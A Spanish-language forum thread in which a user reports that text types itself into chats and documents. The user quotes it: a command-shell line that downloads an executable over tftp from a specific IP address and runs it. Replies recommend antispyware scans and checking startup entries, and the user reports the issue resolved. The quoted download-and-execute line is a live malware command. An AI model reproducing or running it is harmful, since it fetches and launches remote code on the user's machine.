El teclado me escribe solo. VIRUS?

Hola, el caso es que estoy en el messenger hablando y de repente el teclado se pone a escribir :S

En concreto escribe esto:

r%comspec% /c tftp -i 24.205.47.33 GET rzdmseys.exe & start rzdmseys

Tengo el NOD32 con proteccion automatica y actualizado. Además he pasado el kaspersky online, pero no detecta ningún virus... ¿Qué puede ser?
Pasa el spybot search & detroy y alguno especializado en troyanos.
Es muy raro que no salga nada en el google, debes de ser de los primeros que se infectan.
y por si acaso, avisa a tus contactos (con el nick o lo que sea) de que si le sale algun link en tu conversacion NO LE DEN!! que si no no veas como los puteas [tomaaa]
no es un link, solo es el texto ese que he puesto...

Le he pasado el ad-aware y me ha detectado 29 procesos críticos, y los he borrado. Veremos si sigue pasando esto...
Inicio -> Ejecutar -> msconfig -> Inicio -> Desactiva todo lo sospechoso

También prueba a pasar el kaspersky online
enrikette escribió:Inicio -> Ejecutar -> msconfig -> Inicio -> Desactiva todo lo sospechoso

También prueba a pasar el kaspersky online

¿Tú has leido el primer post? Ya he pasado el kaspersky online... y lo de msconfig ya lo había probado
MouTio escribió:
¿Tú has leido el primer post? Ya he pasado el kaspersky online... y lo de msconfig ya lo había probado

ups perdón, me había comido lo del kaspersky, pero del msconfig no pones nada [666]

¿Te pasa solo en el messenger? Si es así, podrías probar con otro cliente de mensajería instantánea, como por ejemplo GAIM.
jeje, no pasa na :P

Me pasa con el messenger y con cualquier cosa, por ejemplo, ayer estaba con el Writer del Open Office y estoy escribiendo un texto y de repente me escribe eso en el documento.... :S
MouTio escribió:no es un link, solo es el texto ese que he puesto...

Le he pasado el ad-aware y me ha detectado 29 procesos críticos, y los he borrado. Veremos si sigue pasando esto...

Mejor pasa el Spybot S&D (como ya te han recomendado), es mucho mejor a la hora de detectar y eliminar malware que el Ad-Aware.
Ok, ya le he pasado el SPYBOT ese, me ha encontrado 51 cosas raras y las he borrado todas :D

Gracias. Por ahora no me hace ya nada raro el pc ;)
9 respuestas